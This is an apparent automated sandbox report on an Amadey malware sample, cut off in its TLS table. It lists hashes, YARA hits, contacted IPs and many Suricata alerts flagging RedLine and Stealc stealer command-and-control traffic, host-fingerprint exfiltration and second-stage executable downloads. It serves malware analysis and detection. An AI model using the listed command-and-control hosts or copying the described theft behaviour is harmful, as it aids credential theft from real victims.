Summary | ZeroBOX

Amadey.exe

RedLine Infostealer Emotet Gen1 RedLine stealer RedlineStealer Browser Login Data Stealer Amadey Generic Malware Hide_EXE .NET framework(MSIL) Malicious Library UPX Malicious Packer ScreenShot Anti_VM PWS
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 3, 2023, 6:09 p.m. Nov. 3, 2023, 6:15 p.m.
Size 306.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5d0310efbb0ea7ead8624b0335b21b7b
SHA256 a43f3cf974c02ae797b15d908b0ce1253781e9523a3a5831c199cb4d5dcbda4a
CRC32 0E9B07EA
ssdeep 6144:Rb6w2ysktItqrvJ8oGJJWfZRXIjqGlG4u67+lAOHziULb:RNtmqjJ8xJmRGltu67sfL
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • Malicious_Packer_Zero - Malicious Packer
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check

IP Address Status Action
104.244.42.129 Active Moloch
104.76.78.101 Active Moloch
109.107.182.2 Active Moloch
142.250.206.205 Active Moloch
142.250.207.46 Active Moloch
142.250.207.99 Active Moloch
142.250.76.132 Active Moloch
142.251.222.42 Active Moloch
167.235.20.126 Active Moloch
149.40.62.171 Active Moloch
164.124.101.2 Active Moloch
171.22.28.213 Active Moloch
171.22.28.239 Active Moloch
172.64.145.151 Active Moloch
18.64.8.109 Active Moloch
185.196.8.176 Active Moloch
185.196.9.171 Active Moloch
192.229.232.89 Active Moloch
193.233.255.73 Active Moloch
194.169.175.118 Active Moloch
194.169.175.235 Active Moloch
23.40.44.77 Active Moloch
5.182.86.30 Active Moloch
54.175.89.124 Active Moloch
64.185.227.156 Active Moloch
77.91.124.1 Active Moloch
77.91.124.86 Active Moloch
85.209.176.171 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 194.169.175.235:42691 -> 192.168.56.101:49178 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 194.169.175.235:42691 -> 192.168.56.101:49178 2046056 ET MALWARE Redline Stealer Activity (Response) A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49174 -> 171.22.28.213:80 2018581 ET MALWARE Single char EXE direct download likely trojan (multiple families) A Network Trojan was detected
TCP 192.168.56.101:49174 -> 171.22.28.213:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 171.22.28.213:80 -> 192.168.56.101:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49191 -> 194.169.175.118:80 2017598 ET MALWARE Possible Kelihos.F EXE Download Common Structure A Network Trojan was detected
TCP 192.168.56.101:49191 -> 194.169.175.118:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 194.169.175.118:80 -> 192.168.56.101:49191 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.169.175.118:80 -> 192.168.56.101:49191 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 194.169.175.118:80 -> 192.168.56.101:49191 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49187 -> 185.196.9.171:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49187 -> 185.196.9.171:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49187 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.196.9.171:80 -> 192.168.56.101:49187 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49187 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 185.196.9.171:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 171.22.28.239:42359 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.196.9.171:80 -> 192.168.56.101:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 171.22.28.239:42359 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 192.168.56.101:49204 -> 171.22.28.239:42359 2046105 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound) A Network Trojan was detected
TCP 192.168.56.101:49204 -> 171.22.28.239:42359 2046105 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound) A Network Trojan was detected
TCP 171.22.28.239:42359 -> 192.168.56.101:49204 2046056 ET MALWARE Redline Stealer Activity (Response) A Network Trojan was detected
TCP 192.168.56.101:49201 -> 185.196.9.171:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 5.182.86.30:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 185.196.8.176:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 5.182.86.30:80 -> 192.168.56.101:49205 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.182.86.30:80 -> 192.168.56.101:49205 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 5.182.86.30:80 -> 192.168.56.101:49205 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 167.235.20.126:80 2044597 ET MALWARE Amadey Bot Activity (POST) M1 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 167.235.20.126:80 -> 192.168.56.101:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 167.235.20.126:80 -> 192.168.56.101:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 171.22.28.213:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 171.22.28.213:80 -> 192.168.56.101:49209 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.101:49215 -> 64.185.227.156:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49215 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 171.22.28.213:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044623 ET MALWARE Amadey Bot Activity (POST) A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
UDP 192.168.56.101:59002 -> 8.8.8.8:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.101:49212 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.101:49212 -> 64.185.227.156:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49212 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.101:49199 -> 185.196.8.176:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 109.107.182.2:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.196.8.176:80 -> 192.168.56.101:49199 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.196.8.176:80 -> 192.168.56.101:49199 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.101:49226 -> 64.185.227.156:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49226 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 185.196.8.176:80 -> 192.168.56.101:49199 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.101:49224 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.101:49224 -> 64.185.227.156:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49224 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 109.107.182.2:80 -> 192.168.56.101:49225 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.107.182.2:80 -> 192.168.56.101:49225 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 109.107.182.2:80 -> 192.168.56.101:49225 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49199 -> 185.196.8.176:80 2044623 ET MALWARE Amadey Bot Activity (POST) A Network Trojan was detected
TCP 192.168.56.101:49276 -> 23.40.44.77:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49286 -> 104.76.78.101:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49295 -> 54.175.89.124:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49288 -> 104.244.42.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49301 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49300 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49305 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49306 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49308 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49309 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49310 -> 18.64.8.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49251 -> 193.233.255.73:80 2047625 ET MALWARE [ANY.RUN] Win32/Stealc Checkin (POST) A Network Trojan was detected
TCP 192.168.56.101:49251 -> 193.233.255.73:80 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 77.91.124.1:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.101:49257 -> 77.91.124.1:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49285 -> 104.76.78.101:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49289 -> 104.244.42.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49291 -> 104.244.42.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49290 -> 104.244.42.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49304 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49317 -> 192.229.232.89:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49315 -> 192.229.232.89:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49319 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.229.232.89:443 -> 192.168.56.101:49322 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49307 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49327 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49320 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49318 -> 192.229.232.89:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49321 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49338 -> 142.250.207.46:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49339 -> 142.250.207.46:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49341 -> 142.250.206.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49347 -> 142.250.207.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49349 -> 142.250.207.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 23.40.44.77:443 -> 192.168.56.101:49279 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 23.40.44.77:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49275 -> 142.250.206.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49292 -> 104.244.42.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49299 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49312 -> 18.64.8.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49314 -> 192.229.232.89:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49323 -> 192.229.232.89:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49325 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49340 -> 142.250.206.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49351 -> 142.250.207.46:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49200 -> 185.196.8.176:80 2044597 ET MALWARE Amadey Bot Activity (POST) M1 A Network Trojan was detected
TCP 192.168.56.101:49352 -> 142.250.207.46:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49269 -> 185.196.8.176:80 2044597 ET MALWARE Amadey Bot Activity (POST) M1 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49277 -> 23.40.44.77:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49354 -> 142.250.76.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49278 -> 23.40.44.77:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49200 -> 185.196.8.176:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49298 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49303 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.196.8.176:80 -> 192.168.56.101:49200 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.196.8.176:80 -> 192.168.56.101:49200 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 18.64.8.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49316 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49344 -> 142.251.222.42:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49348 -> 142.250.207.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49350 -> 142.250.207.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 64.185.227.156:443 -> 192.168.56.101:49218 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 185.196.8.176:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 64.185.227.156:443 -> 192.168.56.101:49228 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 167.235.20.126:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49242 -> 193.233.255.73:80 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 77.91.124.86:19084 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 77.91.124.86:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 77.91.124.86:19084 -> 192.168.56.101:49256 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49256 -> 77.91.124.86:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49296 -> 54.175.89.124:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49302 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49324 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49326 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49328 -> 172.64.145.151:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49335 -> 104.76.78.101:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49336 -> 104.76.78.101:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49345 -> 142.251.222.42:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49346 -> 142.250.207.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49353 -> 142.250.76.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49212 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.101:49215 -> 64.185.227.156:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49286
104.76.78.101:443
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5
TLSv1
192.168.56.101:49295
54.175.89.124:443
C=US, O=Amazon, CN=Amazon RSA 2048 M02 CN=epicgames.com 21:bc:17:60:8c:aa:c2:6d:83:1b:00:7b:40:7b:7e:f4:14:72:79:24
TLSv1
192.168.56.101:49301
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49300
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49305
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49306
172.64.145.151:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com c0:0f:65:6a:3e:73:dd:80:91:b6:59:3b:f1:e9:71:73:57:99:8c:c1
TLSv1
192.168.56.101:49309
